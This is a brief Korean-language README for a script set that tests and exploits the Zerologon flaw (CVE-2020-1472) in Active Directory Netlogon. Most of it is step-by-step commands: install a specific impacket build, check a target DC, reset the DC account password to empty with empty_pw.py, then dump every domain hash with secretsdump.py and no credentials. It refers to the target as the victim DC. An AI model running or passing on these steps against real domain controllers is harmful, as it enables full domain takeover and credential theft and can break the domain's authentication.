
Zerologon 취약점(CVE-2020-1472)을 테스트하고 악용하기 위한 스크립트로, Active Directory에서 도메인 컨트롤러의 비밀번호 재설정 및 해시 덤프를 가능하게 합니다.
Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472)
ZeroLogon은 Microsoft의 Active Directory Netlogon Remote Protocol (MS-NRPC)의 암호화 결함을 악용할 수 있는 취약점으로, 사용자가 NTLM을 사용하여 서버에 로그인할 수 있게 합니다.
익스플로잇을 실행하기 전에 다른 버전의 impacket이 필요하다는 것을 알아야 합니다. 이를 위해 다음을 수행합니다.
apt remove --purge impacket-scripts python3-impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
git clone https://github.com/Nekoox/zerologon.git
cd zerologon
pip install -r requirements.txt
python3 tester.py <DC-NAME> <ip-address>
피해자 DC가 취약한 경우, "Success! DC can be fully compromised by a Zerologon attack."라는 메시지가 나타납니다.
그렇지 않은 경우, 즉 보안 허점이 패치되어 피해자 DC가 취약하지 않은 경우, "Attack failed. Target is probably patched."라는 메시지를 받게 됩니다.
python3 empty_pw.py <DC-NAME> <ip-address>
도메인 컨트롤러가 취약한 경우, 익스플로잇 실행 후 비밀번호가 없어야 합니다.
> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>
이를 실행하면 자격 증명 없이 도메인의 모든 해시를 볼 수 있습니다.